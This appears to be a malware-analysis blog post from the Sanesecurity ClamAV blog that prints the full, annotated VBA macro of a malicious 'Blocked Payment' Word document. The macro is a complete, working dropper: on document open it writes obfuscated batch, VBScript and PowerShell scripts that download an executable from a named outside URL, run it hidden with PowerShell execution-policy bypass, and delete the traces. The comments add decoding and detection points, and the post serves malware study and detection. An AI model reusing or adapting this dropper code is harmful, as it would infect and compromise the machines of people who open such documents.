Sanesecurity

Blocked Payment decoded

Feb 13th, 2015
http://sanesecurity.blogspot.co.uk/
Sanesecurity ClamAV blog: zero hour malware, phishing and scams
A hopefully interesting blog from the world of zero hour malware, phishing, scams and spams

' Exported VBA module header (metadata, not executable code). VB_Name and
' VB_Base identify this as the Word "ThisDocument" class module, which is why
' the Auto_Open / AutoOpen procedures below fire when the document is opened
' with macros enabled.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Word auto-execute entry point: runs when the document is opened with macros
' enabled and simply hands off to h(), which holds the whole dropper logic.
Sub Auto_Open()
h
End Sub
' Dropper body, called from Auto_Open. All the Chr()/Asc() arithmetic and
' "a" & "b" piecing below resolves to fixed strings; the decoded values are
' noted inline. Observed sequence:
'   1. read the user name and build paths for adobeacd-update.ps1/.vbs/.bat
'      under c:\Users\<user>\AppData\Local\Temp, and adobeacd-updatexp.vbs /
'      adobeacd-update.bat under c:\Windows\Temp
'   2. delete any leftovers of those files from an earlier run
'   3. read the OS version through WMI (Win32_OperatingSystem)
'   4. major version 5 (XP / Server 2003): write a .bat + .vbs pair into
'      c:\Windows\Temp that fetches the phadungnaree.ac.th URL below with
'      MSXML2.XMLHTTP / ADODB.Stream into c:\Windows\Temp\444.exe and runs it;
'      major version 6+: write a .ps1 (System.Net.WebClient) downloader plus a
'      .vbs / .bat launcher chain into the user's Temp, ending in
'      powershell.exe -ExecutionPolicy bypass
'   5. start the launcher hidden with Shell(..., 0), then scrub the
'      <select> / <inbox> marker tags out of the document text
' Detection points: WINWORD.EXE writing .bat/.vbs/.ps1 files into either Temp
' directory, WINWORD.EXE spawning cmd.exe / cscript.exe / powershell.exe, an
' Office process issuing WMI queries, and an outbound HTTP GET to the URL
' below carrying a macOS Safari User-Agent from a Windows host.
Sub h()

' JAISODJAS is declared but never used
Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR, JAISODJAS
' ds = 100 seeds the character arithmetic used throughout
ds = 100
' Chr(Abs(100 - 217)) = Chr(117) = "u", so this reads Environ$("username")
USER = Environ$("" + Chr(Abs(ds - 217)) + "s" & "er" & "na" & "me")

' never read
jks = ds

' PST2, VBT2 and BART2 all resolve to "adobeacd-update"; VBTXP2 to
' "adobeacd-updatexp" (Chr(100) = "d")
PST2 = "" & "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & "a" & "te" & ""
VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""
VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p" & ""
BART2 = "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & ""

' "adobeacd-update.ps1" (Chr(100 + 15) = "s")
PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
' "adobeacd-update.vbs" (Chr(118) = "v")
VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
' "adobeacd-updatexp.vbs"
VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
' "adobeacd-update.bat" (Chr(46) ".", Chr(98) "b", Chr(116) "t")
BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""

' the same "adobeacd-update.bat" spelled a second way; replaces BART just below
JSIQOJQ = BART2 + Chr(Abs(ds - 100 - 46)) + Chr(Abs(ds - 100 - 98)) + Chr(Asc(Chr(Abs(ds / 2 + 47)))) + Chr(Asc(Chr(ds + Fix(16.2)))) + "" & ""

BART = JSIQOJQ
' c:\Users\<user>\AppData\Local\Temp\adobeacd-update.ps1
MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1 + "" & ""

' c:\Users\<user>\AppData\Local\Temp\adobeacd-update.bat
ASDASDSA = "" + "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART + "" & ""
' c:\Users\<user>\AppData\Local\Temp\adobeacd-update.vbs
MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + ""
' c:\Windows\Temp\adobeacd-updatexp.vbs (downloader used on the XP branch)
XPFILEDIR = "c:\Windows\Temp\" + VBTXP
' c:\Windows\Temp\adobeacd-update.bat (launcher used on the XP branch);
' KRT, HYF and NUWHDGJS are plain aliases of it
TRT = "c:\Windows\Temp\" + BART
KRT = TRT
HYF = KRT
NUWHDGJS = HYF
' alias of MY_FILDIR
KJSAHDFFFJ = MY_FILDIR

' Clean-up of a previous run: clear file attributes, then delete each dropped
' file if it exists. Errors are suppressed from here to the end of the procedure.
On Error Resume Next
SetAttr MY_FILENDIR, vbNormal

If (Len(Dir(MY_FILENDIR)) <> 0) Then
Kill MY_FILENDIR
End If

On Error Resume Next
SetAttr ASDASDSA, vbNormal
If (Dir(ASDASDSA) <> "") Then
Kill ASDASDSA
End If

On Error Resume Next
SetAttr MY_FILDIR, vbNormal
If (Dir(MY_FILDIR) <> "") Then
Kill KJSAHDFFFJ
End If

On Error Resume Next
SetAttr XPFILEDIR, vbNormal
If (Dir(XPFILEDIR) <> "") Then
Kill XPFILEDIR
End If

' Only jskw is typed here (VBA applies "As Integer" to the last name only);
' the others are Variant. Uuwqdhj, FileNu, FileNuG and mttt are never used.
Dim Uuwqdhj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer

Dim retVal As Variant

' FreeFile is called repeatedly with no Open in between, so these presumably
' all hold the same file number; every file below is closed before the next
' one is opened, so the shared number does not collide.
FileNumber = FreeFile
FileNumb = FreeFile
FileNu = FreeFile
FileNukk = FreeFile

FileNs = FreeFile
Kasdwq = FreeFile
FileNuG = FreeFile

Dim objWMIService As Variant
Dim colOperatingSystems As Variant
Dim objOperatingSystem As Variant
' WMI connection to the local root\cimv2 namespace; an Office process doing
' this is itself worth alerting on
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
' dead filler string, never read
SETL = "colOperatingSystemsKSAHDIUOQWdsad asad32k r8929h2f uigt8y yr2u3gby2g yu dg2uyg3bdu "

' "Select * from Win32_OperatingSystem"; SysReport is built but never used
Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
For Each objOperatingSystem In colOperatingSystems
SysReport = SysReport & "The operating system on this computer is " & _
objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
Next

' Same query again, this time keeping only the version string (of the form
' "major.minor.build", e.g. 5.1.2600 on XP, 6.1.7601 on Windows 7)
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
For Each objOperatingSystem In colOperatingSystems
winverstr = objOperatingSystem.Version
Next

' Val keeps the leading numeric part, so winver is major.minor as a number
winver = Val(winverstr)
WaitFor (1)
' jskw is Integer, so this rounds to a whole number (the major version)
jskw = winver

' XP / Server 2003 branch (major version 5): batch + VBScript downloader
If (jskw <= 5.5) Then

' Writes c:\Windows\Temp\adobeacd-update.bat. Decoded contents:
'   @echo off / :pinkator / ping 1.3.1.2 -n 2          (ping used as a sleep)
'   cscript.exe "c:\Windows\Temp\adobeacd-updatexp.vbs" (runs the downloader)
'   ping 2.2.1.1 -n 2 / :windows
'   c:\Windows\Temp\444.exe                             (runs the payload)
'   :loop / ping / set tar1="adobeacd-update.bat" / del the .vbs and the .bat
'   itself / "if exist ... goto loop" until both are gone / exit
' The LKASHD..., AIYDH... and WQJH... assignments are dead filler strings.
Open NUWHDGJS For Output As #Kasdwq
Print #Kasdwq, ""
Print #Kasdwq, "@echo off"
Print #Kasdwq, ":pinkator"
Print #Kasdwq, "pin" + "g 1.3.1.2 -n" & " 2" + ""
LKASHDUIQWHQUDKNBWQKJDHQ = "sakdj lksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
Print #Kasdwq, "pin" + "g 2.2.1.1 -n" & " 2" + ""
Print #Kasdwq, "" & ":windows"
AIYDHLKASHDUIQWHQUDKNBWQKJDHQ = "qwe23r32sakdj sdqwlksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
WQJHLKASHDUIQWHQUDKNBWQKJDHQ = "sa3244tgfdkdj lksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
Print #Kasdwq, "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + Chr(Asc("x")) + Chr(Asc("e"))
Print #Kasdwq, ":loop"
Print #Kasdwq, "pin" + "g 1.3.1.2 -n" & " 1"
Print #Kasdwq, "set tar1=" + Chr(34) + BART + Chr(33 + 1)
Print #Kasdwq, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "%tar1%" + "" & ""
Print #Kasdwq, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + Chr(34) + "%tar1%" + " goto loop" + ""
Print #Kasdwq, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + VBTXP + Chr(34) + " goto loop"
Print #Kasdwq, "exit"
Close #Kasdwq

WaitFor (2)
' never read
mttt = 88

' Writes c:\Windows\Temp\adobeacd-updatexp.vbs. Decoded contents:
'   strRT = "http://phadungnaree.ac.th/tmp/uok.exe"
'   strTecation = "c:\Windows\Temp\44" + "4.exe"
'   khdfu = "MSXML2.XMLHTTP" (Chr(80) = "P"); CreateObject; open "GET"; send
'   on HTTP 200: CreateObject("ADODB.Stream") (Chr(Sgn(-4)+84) = "S"),
'   Type = 1 (binary), Write ResponseBody, SaveToFile strTecation
'   a WScript.Shell object is created at the end but not used in this script
Open XPFILEDIR For Output As #FileNumber
Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://phadungnaree.ac.th/tmp/uok" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
Print #FileNumber, "jfeuygq = " + Chr(34) + "4.e" + Chr(34) + "+" + Chr(34) + "xe" + Chr(34)
Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + Chr(34) + "+" + "jfeuygq"
Print #FileNumber, "khdfu =" + Chr(34) + "M" + Chr(34) + "+" + Chr(34) + "SX" + Chr(34) + "+" + Chr(34) + "ML2.X" + Chr(34) + "+" + Chr(34) + "MLH" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + "Chr(80)"
Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(khdfu)" + ""
Print #FileNumber, "objXM" & "LH" & "T" & "TP.op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", strRT, False"
JASHDJK = "send()"
Print #FileNumber, "objXMLHTTP." + JASHDJK + " "
Print #FileNumber, "If objXMLHTTP.Status = 200 Then" + "" & ""
Print #FileNumber, "uwqhda = " + Chr(34) + "ADODB." + Chr(34)
Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(uwqhda+Chr(Sgn(-4)+84)+" + Chr(34) + "tream" + Chr(34) + ")"

Print #FileNumber, "objADOStream.Open "
Print #FileNumber, "objADOStream.Type = 1"
Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
Print #FileNumber, "objADOStream.Position = 0 "
Print #FileNumber, "objADOStream.S" & "aveToF" & "ile st" & "rT" & "ecation " + ""
Print #FileNumber, "objADOStream.Close "
Print #FileNumber, "Set objADOStream = Nothing "
Print #FileNumber, "End if "
Print #FileNumber, "Set objXMLHTTP = Nothing"
Print #FileNumber, "Set objShell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")" + "" & ""
Print #FileNumber, ""
Close #FileNumber

WaitFor (1)

' Launch the batch file with window style 0 (vbHide); the resulting
' WINWORD.EXE -> cmd.exe -> cscript.exe chain is the process-tree signal
ASKJD = TRT
retVal = Shell(ASKJD, 0)

End If


' Vista-and-later branch (major version 6+): PowerShell downloader.
' Writes c:\Users\<user>\AppData\Local\Temp\adobeacd-update.ps1. Decoded:
'   $down = New-Object System.Net.WebClient;
'   $url = 'http://phadungnaree.ac.th/tmp/uok.exe';
'   $file = 'c:\Users\<user>\AppData\Local\Temp\444.exe';
'   $down.headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; ... Safari/600.1.25)'
'     (a macOS Safari UA sent from a Windows host - anomaly worth alerting on)
'   $down.DownloadFile($url,$file);
'   $vbsFilePath / $batFilePath / $psFilePath = the adobeacd-update .vbs/.bat/.ps1 paths
'   Start-Sleep -s 15; cmd.exe /c '...\Temp\444.exe';
'   Remove-Item on the .vbs, the .bat, 444.exe and the script itself
'   ($MyInvocation.InvocationName)
'   $ScriptDir, $file1..$file3 and $psHello are written but never used
If (winver > 5.5) Then
Open MY_FILENDIR For Output As #FileNumber
Print #FileNumber, "$do" & "wn = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
Print #FileNumber, "$url = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://phadungnaree.ac.th/tmp/uok" & ".e" & "x" + "e';"
Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25'" + "+''" + "" + ";"
Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"

' Chr(39) = ' and Chr(43) = +, so the PowerShell side sees e.g. '...\adobeacd-update'+'.'+'v'+'bs'
Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + ";"
' the ";" after BART2 is the Print statement's item separator (items are
' written adjacent), so the output line is the same as with "+"
Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART2; Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"

Print #FileNumber, "Start-Sleep -s 15;"
Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
Print #FileNumber, "$psHello = 'aisdjhiqowhdiq';"
Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
Close #FileNumber

' Writes c:\Users\<user>\AppData\Local\Temp\adobeacd-update.vbs. Decoded:
'   dff = 68 (never used); currentDirectory = left(WScript.ScriptFullName, ...)
'   an objFSO = CreateObject(... Scripting.FileSystemObject ...) line that the
'   following lines never use
'   currentFile = "C:\Users\<user>\AppData\Local\Temp\adobeacd-update" & "." & "p" & "s1"
'   Set objShell = CreateObject("WScript.Shell")   (Chr(Sgn(-4)+68) = "C")
'   objShell.Run "powershell.exe -noexit -ExecutionPolicy bypass -noprofile
'     -file " & currentFile,0,true
' "-ExecutionPolicy bypass -noprofile -file" on a powershell.exe command line
' launched under WINWORD.EXE is a high-signal detection string.
Open MY_FILDIR For Output As #FileNumb
Print #FileNumb, "Dim dff"
Print #FileNumb, "dff = 68"
Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & Chr(34) & "&" & "S" & Chr(34) & Chr("&") & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "he" + Chr(Asc("l")) + Chr(Asc("l")) + " = " & Chr(Sgn(-4) + 68) + "reate" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")" + ""
Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) + Chr(34) + "+" + Chr(34) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"

Print #FileNumb, ""
Close #FileNumb

' Writes c:\Users\<user>\AppData\Local\Temp\adobeacd-update.bat. Decoded:
'   @echo off / ping 1.1.2.2 -n 2 (sleep) / chcp 1251 (Windows Cyrillic code page)
'   :csakclasjdklas / set Var1=".", Var2="v", Var3="bs",
'   Var4="c:\Users\<user>\AppData\Local\Temp\adobeacd-update"
'   cscript.exe %Var4%%Var1%%Var2%%Var3%  (the .vbs name split across the
'   four quoted variables) / exit
Open ASDASDSA For Output As #FileNs
Print #FileNs, "@echo off"
Print #FileNs, "ping 1.1.2.2 -n" & " 2"
Print #FileNs, "chcp 1251"
Print #FileNs, ":csakclasjdklas"
Print #FileNs, "set Var1=" + Chr(34) + "." + Chr(34)
Print #FileNs, "set Var2=" + Chr(34) + "v" + Chr(34)
Print #FileNs, "set Var3=" + Chr(34) + "bs" + Chr(34)
Print #FileNs, "set Var4=" + Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34)
Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & "%Var4%" + "%Var1%%Var2%%Var3%"
Print #FileNs, "exit"
Close #FileNs

SetAttr MY_FILENDIR, vbNormal
SetAttr ASDASDSA, vbNormal
SetAttr MY_FILDIR, vbNormal

WaitFor (1)
' Run the .bat hidden (window style 0 = vbHide); the files it chains through
' give a WINWORD.EXE -> cmd.exe -> cscript.exe -> powershell.exe process tree
SJAKLD = ASDASDSA
retVal = Shell(SJAKLD, 0)
End If


' Document clean-up: findTest deletes the text between <select> and </select>,
' secondTest turns the text between <inbox> and </inbox> black, and the four
' Find/Replace loops below then remove the literal tags themselves (replaced
' by a single space) from every story range of the document.
findTest
secondTest
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "<" & "sel" & "ect>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange

For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "</s" & "ele" & "ct>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange

For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "<" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange

For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "</" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange


End Sub
' Busy-waits for NumOfSeconds, pumping the message loop with DoEvents so Word
' stays responsive. h() uses it for the 1-2 second pauses between writing a
' dropped file and launching it. Timer counts seconds since midnight, so a
' wait that spans midnight ends early (irrelevant for these short delays).
Sub WaitFor(NumOfSeconds As Long)
' deadline kept as a whole number of seconds (Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds

Do While Timer < SngSec
DoEvents
Loop

End Sub
  279.  
' Second Word auto-exec procedure name; forwards to Auto_Open so the payload
' runs under either trigger.
Sub AutoOpen()
Auto_Open
End Sub
' Excel workbook-open event handler wired to the same payload, presumably so
' the module also fires if dropped into an Excel container; in this Word
' ThisDocument module there is no Workbook object to raise it (confirm).
Sub Workbook_Open()
Auto_Open
End Sub
' Deletes the document text enclosed between the first "<select>" and the
' following "</select>" marker (the tags themselves are removed afterwards by
' the Find/Replace loops in h()). UYAS, ASKASAIEJ, KASHDJKAHS and ASKSASADW
' are filler strings that are never read.
Sub findTest()
Dim firstTerm As String
Dim secondTerm As String
Dim rrtt As Range
Dim selRange As Range
Dim selectedText As String
UYAS = ""
Set rrtt = ActiveDocument.Range
' "<select>" and "</select>", presumably pieced together so the literal tag
' never appears in the macro text
firstTerm = "" + "<" + "s" + "e" & "le" + "ct>" + UYAS + ""
secondTerm = "<" + "/" + "se" + "l" & "ec" + "t>"
ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
With rrtt.Find
.Text = firstTerm
.MatchWholeWord = True
' on a hit Word redefines rrtt to the match; collapsing to its end makes
' selRange start just after "<select>"
.Execute
KASHDJKAHS = "ajsdhu9qwdhu32dhkj h231ueh31e2u heh2 ue1h"
rrtt.Collapse direction:=wdCollapseEnd
Set selRange = ActiveDocument.Range
selRange.Start = rrtt.End
' second search continues from the collapsed range; collapsing to its start
' makes selRange end just before "</select>"
.Text = secondTerm
.MatchWholeWord = True
.Execute
ASKSASADW = "asjldklas"
rrtt.Collapse direction:=wdCollapseStart
selRange.End = rrtt.Start
' removes the enclosed text; Delete's return value is stored but never used
selectedText = selRange.Delete
End With
End Sub
  314.  
' Counterpart of findTest for the "<inbox>" ... "</inbox>" markers: instead of
' deleting the enclosed text it sets its font colour to black - presumably the
' lure text is stored in a non-black colour until the macro runs (confirm
' against the document body). myRanget and SKHDAJKHASJ / ASKIEJ are unused.
Sub secondTest()
Dim firstTerm As String
Dim secondTerm As String
Dim myRanget As Range
Dim yytt As Range
Dim selRanget As Range
Dim selectedTextt As String

Set yytt = ActiveDocument.Range
SKHDAJKHASJ = "aslkdjk sadksaj ksaljd klsajd ksajd KSJDKASL JD"
' "<inbox>" and "</inbox>"
firstTerm = "<" + "in" & "bo" + "x>"
secondTerm = "</" + "in" & "bo" + "x>"
With yytt.Find
.Text = firstTerm
.MatchWholeWord = True
' on a hit Word redefines yytt to the match; selRanget starts just after it
.Execute
ASKIEJ = "ask as8d j dnkjh12kh1 sad"
yytt.Collapse direction:=wdCollapseEnd

Set selRanget = ActiveDocument.Range
selRanget.Start = yytt.End
.Text = secondTerm
.MatchWholeWord = True
.Execute

' selRanget now spans the text between the two tags
yytt.Collapse direction:=wdCollapseStart
selRanget.End = yytt.Start
' copies the range's text (Range default property) into a string that is never used
selectedTextt = selRanget
selRanget.Font.Color = wdColorBlack
End With
End Sub